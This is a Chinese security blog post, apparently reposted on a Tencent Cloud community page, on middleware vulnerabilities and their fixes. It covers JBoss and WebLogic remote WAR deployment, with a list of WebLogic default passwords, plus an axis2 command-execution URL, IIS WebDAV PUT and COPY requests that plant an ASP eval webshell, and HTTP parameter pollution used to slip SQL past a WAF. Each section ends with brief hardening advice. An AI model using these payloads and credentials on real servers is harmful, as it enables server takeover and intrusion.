前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >中间件漏洞与防护

中间件漏洞与防护

作者头像
C4rpeDime
发布2018-12-05 11:42:11
1.9K0
发布2018-12-05 11:42:11
举报
文章被收录于专栏:黑白安全

中间件漏洞可以说是最容易被web管理员忽视的漏洞,原因很简单,因为这并不是应用程序代码上存在的漏洞,而是属于一种应用部署环境的配置不当或者使用不当造成的 我们在处理应急响应事件时经常遇到这么一种情况,客户网站代码是外包的,也就是第三方公司负责开发,而部署可能是由客户内部运维人员负责。暂不说他们对于中间件安全的重视程度与了解程度,只谈发现漏洞后如何处理,便是一团乱。开发商推卸说这并不是代码上的问题,他们完全是按照安全开发流程(SDL)走的,所以跟他无关;运维人员就一脸蒙蔽了,反驳道:你们当初没跟我说要配置什么啊,只是让我安装个程序就ok了,我怎么知道?

中间件、容器、服务器傻傻分不清?

在谈中间件安全问题时,我觉得有必要先梳理下以上几种关系以及概念。当初我在接触这些概念时,脑子里就是一团浆糊,中间件、容器、服务器、webserver等等概念感觉彼此很相似,但又有所区别。

基础概念与作用

这里只介绍web中间件、web服务器、web容器,因为除了web以外,其概念还可以扩展为数据库等。

web服务器

web服务器用于提供http服务,即向客户端返回信息,其可以处理HTTP协议,响应针对静态页面或图片的请求,控制页面跳转,或者把动态请求委托其它程序(中间件程序)等。

web中间件

web中间件用于提供系统软件和应用软件之间的连接,以便于软件各部件之间的沟通,其可以为一种或多种应用程序提供容器。

web容器

web容器用于给处于其中的应用程序组件(JSP,SERVLET)提供一个环境,是中间件的一个组成部分,它实现了对动态语言的解析。比如tomcat可以解析jsp,是因为其内部有一个jsp容器。

所属的类别

web服务器:IIS、Apache、nginx、tomcat、weblogic、websphere等。 web中间件:apache tomcat、BEA WebLogic、IBM WebSphere等。 web容器:JSP容器、SERVLET容器、ASP容器等。

注意:web中间件与web服务器是有重叠的,原因在于tomcat等web中间件也具备web服务器的功能。

重点分析

web服务器只是提供静态网页解析(如apache),或者提供跳转的这么一种服务。而web中间件(其包含web容器)可以解析动态语言,比如tomcat可以解析jsp(因为tomcat含有jsp容器),当然它也可以解析静态资源,因此它既是web中间件也是web服务器。不过tomcat解析静态资源的速度不如apache,因此常常两者结合使用。

JBoss漏洞与防护

JBoss这是一个基于JavaEE的应用服务器,与tomcat类似的是jboss也有远程部署平台,但不需要登陆。漏洞利用过程与tomcat类似,因此不再截图说明。除了远程部署漏洞外,jboss还存在反序列化漏洞,这里不再详述。

JBoss远程部署漏洞详情

默认管理后台地址:

代码语言:javascript
复制
http://localhost:8080

getshell过程  

访问管理页面,查看jboss配置页面中的JMX Console,这是JBoss的管理台程序,进入后找到Jboss.deployment包,该包下有flavor=URL.type=DeploymentSccanner选项。进入部署页面后便可以上传war文件,但与tomcat不同的是它不是本地上传war文件,而是从远程地址下载,因此需要自己准备一个文件服务器,用于远程下载war到目标jboss服务器上。具体方法是在部署页面找到”ADDURL”方法,输入URL地址,点击invoke。除了以上方法外,JMX-Console提供的BSH方法,同样也可以部署war包。

JBoss漏洞防护

1.开启jmx-console密码认证 2.删除jmx-console.war与web-console.war

WebLogic漏洞与防护

weblogic是一个基于JavaEE构架的中间件,安装完weblogic默认会监听7001端口。漏洞利用过程与tomcat类似,因此不再截图说明。

Weblogic远程部署漏洞详情

默认后台地址:

代码语言:javascript
复制
http://localhost:7001/console/login/loginForm.jsp

账号密码:

代码语言:javascript
复制
用户名密码均为:weblogic
用户名密码均为:system
用户名密码均为:portaladmin
用户名密码均为:guest

成功登陆weblogic后台后,找到部署按钮,点击后选择安装,然后可以选择本地上传war包也可以利用远程url下载,部署完成后,weblogic会给出文件地址。

Weblogic漏洞防护

删除远程部署页面

axis2漏洞与防护

axis2也是apache的一个项目,是新一代的SOAP引擎,其存在一个任意命令执行漏洞。(该漏洞来自补天平台)

axis2命令执行漏洞详情

默认后台地址:

代码语言:javascript
复制
http://localhost/axis2-admin/

默认账号密码:admin与axis2 登录后效果如下:

中间件漏洞与防护
中间件漏洞与防护

执行系统命令poc

代码语言:javascript
复制
http://localhost/services/Axis2Shell/execCmd?cmd=whoami

IIS漏洞与防护

IIS是微软的一款web服务器,其配置不当容易产生webdav漏洞。webdav本身是iis的一项扩展功能,开启后可以使用除了get、post以外的一些请求类型,比如put等。但如果配置不当,就会导致文件上传漏洞。除了webdav漏洞,近期还爆出了一个远程命令执行漏洞,具体移步:IIS6.0远程命令执行漏洞(CVE-2017-7269)

IIS Webdav漏洞详情

当测试一个站点是否存在webdav漏洞时,可以先构造一个OPTIONS请求,若返回200,则查看返回头的Allow参数中包含哪些方法(可以请求)。

代码语言:javascript
复制
OPTIONS  / HTTP/1.1Host:baidu.com

如果存在PUT方法,则可以尝试写入一个txt文件。

代码语言:javascript
复制
PUT /shell.txt HTTP/1.1HOST:baidu.comContent-length:30<%eval request("test")%>

若返回200则说明上传成功,此时可以手动访问此文件,确认是否存在。当然也有可能返回403,这表示此目录没有上传的权限,可以尝试上传到其他目录。 通过MOVE或COPY方法改文件后缀名。

代码语言:javascript
复制
COPY /shell.txt HTTP/1.1HOST:xxx.comDestination:http://www.xxx.com/shell.asp

IIS漏洞防护

关闭webdav功能

HPP漏洞

HPP漏洞是web容器处理http参数时的问题,前面几款web服务器都或多或少存在这样的问题。

代码语言:javascript
复制
<?php
    $str=$_REQUEST['str'];                    #$_REQUEST[]函数可以接受GET/POST。
    Echo $str;
?>

比如访问URL:

代码语言:javascript
复制
http://www.xxx.com/index.php?str=hello

此时页面显示hello 但如果访问:

代码语言:javascript
复制
http://www.xxx.com/index.php?str=hello&str=world&str=test

此时页面显示test,把前面参数的值给覆盖了,这就是http参数污染。

利用场景

绕过WAF,如:

代码语言:javascript
复制
PHP:index.php?str=1&str=select * from admin --

因为WAF可能会校验值的第一个单词,如果为select则触发,这样子可以避免被触发。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 中间件、容器、服务器傻傻分不清?
    • 基础概念与作用
      • web服务器
      • web中间件
      • web容器
      • 所属的类别
    • 重点分析
    • JBoss漏洞与防护
      • JBoss远程部署漏洞详情
        • getshell过程  
          • JBoss漏洞防护
          • WebLogic漏洞与防护
            • Weblogic远程部署漏洞详情
              • Weblogic漏洞防护
              • axis2漏洞与防护
              • axis2命令执行漏洞详情
              • IIS漏洞与防护
                • IIS Webdav漏洞详情
                  • IIS漏洞防护
                  • HPP漏洞
                    • 利用场景
                    相关产品与服务
                    容器服务
                    腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
                    领券
                    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档